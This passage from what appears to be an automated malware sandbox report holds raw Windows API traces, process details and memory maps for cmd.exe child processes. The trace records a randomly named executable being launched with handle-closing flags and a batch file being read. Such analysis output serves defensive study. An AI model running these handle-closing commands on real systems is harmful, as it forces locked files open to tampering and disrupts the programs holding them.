lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0293.513] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0293.514] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0293.514] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.514] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0xc6e930, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6e930) returned 0xcba860 [0293.514] FindClose (in: hFindFile=0xcba860 | out: hFindFile=0xcba860) returned 1 [0293.514] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0293.514] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0293.514] GetConsoleTitleW (in: lpConsoleTitle=0xc6ee04, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0293.514] InitializeProcThreadAttributeList (in: lpAttributeList=0xc6ed30, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc6ed14 | out: lpAttributeList=0xc6ed30, lpSize=0xc6ed14) returned 1 [0293.514] UpdateProcThreadAttribute (in: lpAttributeList=0xc6ed30, dwFlags=0x0, Attribute=0x60001, lpValue=0xc6ed1c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc6ed30, lpPreviousValue=0x0) returned 1 [0293.514] GetStartupInfoW (in: lpStartupInfo=0xc6ed68 | out: lpStartupInfo=0xc6ed68*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0293.514] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0293.514] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0293.514] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0293.514] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0293.514] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0293.514] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0293.514] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0293.514] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0293.514] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"Win", _MaxCount=0x7) returned -3 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0293.515] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0293.515] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0293.515] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula -c -y -p handles -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xc6ecb8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c -y -p handles -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc6ed04 | out: lpCommandLine="vIDhS3md.exe -accepteula -c -y -p handles -nobanner", lpProcessInformation=0xc6ed04*(hProcess=0xb8, hThread=0xcc, dwProcessId=0xec0, dwThreadId=0x24c)) returned 1 [0293.522] CloseHandle (hObject=0xcc) returned 1 [0293.522] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0293.522] GetEnvironmentStringsW () returned 0xcbb300* [0293.522] FreeEnvironmentStringsA (penv="=") returned 1 [0293.522] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0296.683] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0xc6ec9c | out: lpExitCode=0xc6ec9c*=0x1) returned 1 [0296.683] CloseHandle (hObject=0xb8) returned 1 [0296.683] _vsnwprintf (in: _Buffer=0xc6ed84, _BufferCount=0x13, _Format="%08X", _ArgList=0xc6eca4 | out: _Buffer="00000001") returned 8 [0296.683] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0296.683] GetEnvironmentStringsW () returned 0xcbb300* [0296.683] FreeEnvironmentStringsA (penv="=") returned 1 [0296.683] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0296.683] GetEnvironmentStringsW () returned 0xcbb300* [0296.683] FreeEnvironmentStringsA (penv="=") returned 1 [0296.683] DeleteProcThreadAttributeList (in: lpAttributeList=0xc6ed30 | out: lpAttributeList=0xc6ed30) [0296.683] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.683] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0296.775] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.775] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0296.775] _get_osfhandle (_FileHandle=0) returned 0x38 [0296.775] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0296.776] SetConsoleInputExeNameW () returned 0x1 [0296.776] GetConsoleOutputCP () returned 0x1b5 [0296.776] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0296.776] SetThreadUILanguage (LangId=0x0) returned 0x409 [0296.776] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc6f664, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0296.776] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0296.776] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.776] SetFilePointer (in: hFile=0xb8, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0296.777] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.777] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0296.777] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc6f634, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xc6f634*=0x0, lpOverlapped=0x0) returned 1 [0296.777] GetLastError () returned 0x0 [0296.777] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.778] GetFileType (hFile=0xb8) returned 0x1 [0296.778] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.778] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0296.778] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.778] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0296.778] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc6f634, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xc6f634*=0x0, lpOverlapped=0x0) returned 1 [0296.778] GetLastError () returned 0x0 [0296.778] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.778] GetFileType (hFile=0xb8) returned 0x1 [0296.778] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.778] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0296.779] longjmp () [0296.779] _tell (_FileHandle=3) returned 226 [0296.779] _close (_FileHandle=3) returned 0 [0296.779] CmdBatNotificationStub () returned 0x1 [0296.779] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.779] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0296.779] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.779] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0296.779] _get_osfhandle (_FileHandle=0) returned 0x38 [0296.779] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0296.779] SetConsoleInputExeNameW () returned 0x1 [0296.779] GetConsoleOutputCP () returned 0x1b5 [0296.780] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0296.780] SetThreadUILanguage (LangId=0x0) returned 0x409 [0296.780] exit (_Code=1) Thread: id = 854 os_tid = 0x794 Process: id = "89" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2c00d000" os_pid = "0x688" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0xa40" cmd_line = "C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"Genko_1.jtp\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6563 start_va = 0x8e0000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 6564 start_va = 0x900000 end_va = 0x901fff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 6565 start_va = 0x910000 end_va = 0x923fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 6566 start_va = 0x930000 end_va = 0x96ffff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 6567 start_va = 0x970000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 6568 start_va = 0xa70000 end_va = 0xa73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 6569 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6570 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 6571 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6572 start_va = 0x7faa0000 end_va = 0x7fac2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007faa0000" filename = "" Region: id = 6573 start_va = 0x7facb000 end_va = 0x7facbfff entry_point = 0x0 region_type = private name = "private_0x000000007facb000" filename = "" Region: id = 6574 start_va = 0x7facc000 end_va = 0x7facefff entry_point = 0x0 region_type = private name = "private_0x000000007facc000" filename = "" Region: id = 6575 start_va = 0x7facf000 end_va = 0x7facffff entry_point = 0x0 region_type = private name = "private_0x000000007facf000" filename = "" Region: id = 6576 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6577 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6578 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 6579 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6580 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 6581 start_va = 0xa80000 end_va = 0xa80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 6582 start_va = 0xa90000 end_va = 0xa91fff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 6583 start_va = 0xc20000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 6584 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6585 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6586 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6587 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6588 start_va = 0xc30000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 6590 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6591 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6592 start_va = 0x8e0000 end_va = 0x8effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 6593 start_va = 0x7f9a0000 end_va = 0x7fa9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f9a0000" filename = "" Region: id = 6650 start_va = 0xaa0000 end_va = 0xb5dfff entry_point = 0xaa0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6651 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6652 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 6653 start_va = 0xc30000 end_va = 0xd2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 6654 start_va = 0xd30000 end_va = 0xdbffff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 6655 start_va = 0xe10000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 6656 start_va = 0x7fac8000 end_va = 0x7facafff entry_point = 0x0 region_type = private name = "private_0x000000007fac8000" filename = "" Region: id = 6657 start_va = 0x8f0000 end_va = 0x8f3fff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 6744 start_va = 0x900000 end_va = 0x903fff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 6745 start_va = 0xf10000 end_va = 0x1246fff entry_point = 0xf10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 838 os_tid = 0x790 [0265.873] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0265.873] __set_app_type (_Type=0x1) [0265.873] __p__fmode () returned 0x77984d6c [0265.873] __p__commode () returned 0x77985b1c [0265.873] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0265.874] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0265.874] GetCurrentThreadId () returned 0x790 [0265.874] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x790) returned 0x84 [0265.874] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0265.874] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0265.874] SetThreadUILanguage (LangId=0x0) returned 0x409 [0265.982] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0265.982] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xa6f894 | out: phkResult=0xa6f894*=0x0) returned 0x2 [0265.983] VirtualQuery (in: lpAddress=0xa6f89b, lpBuffer=0xa6f84c, dwLength=0x1c | out: lpBuffer=0xa6f84c*(BaseAddress=0xa6f000, AllocationBase=0x970000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0265.983] VirtualQuery (in: lpAddress=0x970000, lpBuffer=0xa6f84c, dwLength=0x1c | out: lpBuffer=0xa6f84c*(BaseAddress=0x970000, AllocationBase=0x970000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0265.983] VirtualQuery (in: lpAddress=0x971000, lpBuffer=0xa6f84c, dwLength=0x1c | out: lpBuffer=0xa6f84c*(BaseAddress=0x971000, AllocationBase=0x970000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0265.983] VirtualQuery (in: lpAddress=0x973000, lpBuffer=0xa6f84c, dwLength=0x1c | out: lpBuffer=0xa6f84c*(BaseAddress=0x973000, AllocationBase=0x970000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0265.983] VirtualQuery (in: lpAddress=0xa70000, lpBuffer=0xa6f84c, dwLength=0x1c | out: lpBuffer=0xa6f84c*(BaseAddress=0xa70000, AllocationBase=0xa70000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0265.983] GetConsoleOutputCP () returned 0x1b5 [0266.104] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0266.105] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0266.105] _get_osfhandle (_FileHandle=1) returned 0xc0 [0266.105] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0266.105] _get_osfhandle (_FileHandle=1) returned 0xc0 [0266.105] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0266.105] _get_osfhandle (_FileHandle=0) returned 0x38 [0266.105] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0266.130] GetEnvironmentStringsW () returned 0xe17f48* [0266.130] FreeEnvironmentStringsA (penv="=") returned 1 [0266.130] GetEnvironmentStringsW () returned 0xe17f48* [0266.130] FreeEnvironmentStringsA (penv="=") returned 1 [0266.130] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa6e7f8 | out: phkResult=0xa6e7f8*=0x94) returned 0x0 [0266.130] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa6e7fc, lpData=0xa6e804, lpcbData=0xa6e800*=0x1000 | out: lpType=0xa6e7fc*=0x0, lpData=0xa6e804*=0xe, lpcbData=0xa6e800*=0x1000) returned 0x2 [0266.130] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa6e7fc, lpData=0xa6e804, lpcbData=0xa6e800*=0x1000 | out: lpType=0xa6e7fc*=0x4, lpData=0xa6e804*=0x1, lpcbData=0xa6e800*=0x4) returned 0x0 [0266.130] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa6e7fc, lpData=0xa6e804, lpcbData=0xa6e800*=0x1000 | out: lpType=0xa6e7fc*=0x0, lpData=0xa6e804*=0x1, lpcbData=0xa6e800*=0x1000) returned 0x2 [0266.130] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa6e7fc, lpData=0xa6e804, lpcbData=0xa6e800*=0x1000 | out: lpType=0xa6e7fc*=0x4, lpData=0xa6e804*=0x0, lpcbData=0xa6e800*=0x4) returned 0x0 [0266.130] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa6e7fc, lpData=0xa6e804, lpcbData=0xa6e800*=0x1000 | out: lpType=0xa6e7fc*=0x4, lpData=0xa6e804*=0x40, lpcbData=0xa6e800*=0x4) returned 0x0 [0266.130] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa6e7fc, lpData=0xa6e804, lpcbData=0xa6e800*=0x1000 | out: lpType=0xa6e7fc*=0x4, lpData=0xa6e804*=0x40, lpcbData=0xa6e800*=0x4) returned 0x0 [0266.130] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa6e7fc, lpData=0xa6e804, lpcbData=0xa6e800*=0x1000 | out: lpType=0xa6e7fc*=0x0, lpData=0xa6e804*=0x40, lpcbData=0xa6e800*=0x1000) returned 0x2 [0266.130] RegCloseKey (hKey=0x94) returned 0x0 [0266.130] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa6e7f8 | out: phkResult=0xa6e7f8*=0x94) returned 0x0 [0266.130] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa6e7fc, lpData=0xa6e804, lpcbData=0xa6e800*=0x1000 | out: lpType=0xa6e7fc*=0x0, lpData=0xa6e804*=0x40, lpcbData=0xa6e800*=0x1000) returned 0x2 [0266.131] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa6e7fc, lpData=0xa6e804, lpcbData=0xa6e800*=0x1000 | out: lpType=0xa6e7fc*=0x4, lpData=0xa6e804*=0x1, lpcbData=0xa6e800*=0x4) returned 0x0 [0266.131] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa6e7fc, lpData=0xa6e804, lpcbData=0xa6e800*=0x1000 | out: lpType=0xa6e7fc*=0x0, lpData=0xa6e804*=0x1, lpcbData=0xa6e800*=0x1000) returned 0x2 [0266.131] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa6e7fc, lpData=0xa6e804, lpcbData=0xa6e800*=0x1000 | out: lpType=0xa6e7fc*=0x4, lpData=0xa6e804*=0x0, lpcbData=0xa6e800*=0x4) returned 0x0 [0266.131] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa6e7fc, lpData=0xa6e804, lpcbData=0xa6e800*=0x1000 | out: lpType=0xa6e7fc*=0x4, lpData=0xa6e804*=0x9, lpcbData=0xa6e800*=0x4) returned 0x0 [0266.131] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa6e7fc, lpData=0xa6e804, lpcbData=0xa6e800*=0x1000 | out: lpType=0xa6e7fc*=0x4, lpData=0xa6e804*=0x9, lpcbData=0xa6e800*=0x4) returned 0x0 [0266.131] RegQueryValueExW (in: 